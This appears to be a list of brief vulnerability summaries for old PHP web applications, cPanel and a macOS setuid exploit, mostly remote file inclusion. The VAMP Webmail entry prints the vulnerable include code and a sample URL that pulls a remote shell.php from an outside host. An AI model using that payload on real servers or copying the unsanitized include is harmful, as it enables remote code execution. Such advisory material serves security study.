JAF CMS version 4.0 is vulnerable to remote file inclusion. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable server. This can allow the attacker to execute arbitrary code on the server.
Travelsized CMS version 0.4 is vulnerable to a remote file include vulnerability. An attacker can exploit this vulnerability to execute arbitrary code on the vulnerable system.
A remote file inclusion vulnerability exists in phpMyProfiler, due to the application including files based on user input without proper validation. An attacker can exploit this vulnerability to include arbitrary remote files, allowing for the execution of arbitrary code on the vulnerable system.
JAF CMS version 4.0 RC1 and prior are prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this issue to execute arbitrary PHP code within the context of the webserver process.
BBaCE v3 ( Bulletin Board Ace ) is vulnerable to a Remote File Inclusion vulnerability. An attacker can exploit this vulnerability by sending a malicious URL to an unsuspecting user. The malicious URL contains a malicious script which is hosted on a remote server. When the user visits the malicious URL, the malicious script is executed on the vulnerable server.
This exploit is used to gain root access on cPanel <= 10.8.x systems. It uses the cpwrap and mysqlwrap binaries to create a malicious strict.pm file, which is then used to compile a setuid root binary. The malicious binary is then executed to gain root access.
BasiliX version 1.1.1 is vulnerable to a Remote File Include vulnerability. This vulnerability allows an attacker to include a remote file, usually through a malicious URL, and execute arbitrary code on the vulnerable server.
When a process executes a setuid executable, all existing rights to the task port are invalidated, to make sure unauthorized processes do not retain control of the process. Exception handlers however remain installed, and when some kind of hardware exception occurs, the exception handler can receive a new right to the task port as one of its arguments, and thus regain full control over the process. This exploit installs an exception handler on illegal memory access, forks off a child (the handler is inherited), and uses RLIMIT_STACK to cause a segfault after exec(). The shell code invokes /usr/bin/id.
The vulnerability exists due to insufficient sanitization of user-supplied input passed to the 'target' parameter in 'change_preferences2.php', 'create_file.php', 'upload_local.php' and 'upload_multi.php' scripts. A remote attacker can include a file from a remote server and execute arbitrary code on the vulnerable system.
VAMP Webmail is vulnerable to a Remote File Inclusion vulnerability. The vulnerable page is yesno.phtml located in the /setup/ directory. The vulnerable code is <?if($answer=="Yes") { include $yes_url; } else { include $no_url; }?>. An attacker can exploit this vulnerability by sending a malicious URL in the no_url parameter. For example, http://www.site.com/wamp_dir/setup/yesno.phtml?no_url=http://sonic-banda-di-lamer.gay/shell.php?.
Services By CQR